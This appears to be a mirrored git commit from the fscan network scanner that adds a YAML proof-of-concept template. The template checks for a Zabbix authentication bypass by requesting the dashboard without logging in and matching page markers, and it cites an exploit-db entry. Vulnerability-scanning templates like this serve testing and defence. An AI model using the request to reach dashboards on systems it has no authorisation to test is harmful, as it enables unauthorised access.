mirror of
https://github.com/shadow1ng/fscan.git
synced 2026-09-26 05:01:53 +08:00
commit message
This commit is contained in:
@@ -0,0 +1,11 @@
|
||||
name: poc-yaml-zabbix-authentication-bypass
|
||||
rules:
|
||||
- method: GET
|
||||
path: /zabbix.php?action=dashboard.view&dashboardid=1
|
||||
follow_redirects: false
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(bytes("<a class=\"top-nav-zbbshare\" target=\"_blank\" title=\"Zabbix Share\" href=\"https://share.zabbix.com/\">Share</a>")) && response.body.bcontains(b"<title>Dashboard</title>")
|
||||
detail:
|
||||
author: FiveAourThe(https://github.com/FiveAourThe)
|
||||
links:
|
||||
- https://www.exploit-db.com/exploits/47467
|
||||
Reference in New Issue
Block a user